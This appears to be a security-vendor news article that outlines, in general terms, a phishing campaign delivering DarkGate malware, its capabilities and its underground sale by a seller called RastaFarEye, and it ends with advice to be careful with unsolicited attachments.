HQ/EMEAFind out how we can help your business
A malspam campaign has caused a surge of DarkGate malware appearance in the cybercriminal landscape. Based on reports, the sudden increase in malware usage could be from its developers renting out the malware to its affiliates.
The malware attack starts with a phishing URL that, once a user accesses it, passes through a traffic direction system to guide them to an MSI payload subject to certain conditions. Moreover, the campaign includes a refresh header in the HTTP response.
Moreover, the campaign activates a multi-stage process that applies an AutoIt script to run a shellcode that acts as a conduit to decrypt and deploy DarkGate through a load once a targeted user opens the MSI file.
The researchers explained that the loader could parse the Autolt script and extract the encrypted malware sample. On the other hand, an alternative variant of the attacks has been using a Visual Basic Script (VBS) instead of an MSI file. This process uses cURL to recover the Autolt executable and script files. However, researchers have yet to identify the exact delivery method of the VBS.
A single threat actor distributes the DarkGate malware in the threat landscape.
According to investigations, a threat actor known as RastaFarEye is responsible for selling the DarkGate malware, primarily in the underground forums. The malware contains various capabilities, such as bypassing security software, establishing persistence, escalating privileges, and stealing data from web browsers and other software solutions, like FileZilla and Discord.
Additionally, it could establish a connection with a command-and-control server for data exfiltration, deploying cryptominers, enumerating files, remotely capturing screenshots, and running other commands.
RastaFarEye offers the malware for $1,000/per day for a one-day subscription, $15,000/per month, and $100,000 per year. Its developers advertise their product as the ultimate tool for pen-testers and have features not present in other devices. Finally, one of the earliest versions of DarkGate comes with a ransomware module.
Every malicious malware strain, like DarkGate, still propagates and reaches the target through phishing techniques. Experts suggest that everyone should be vigilant in opening attachments within unwanted emails and unsolicited communications.
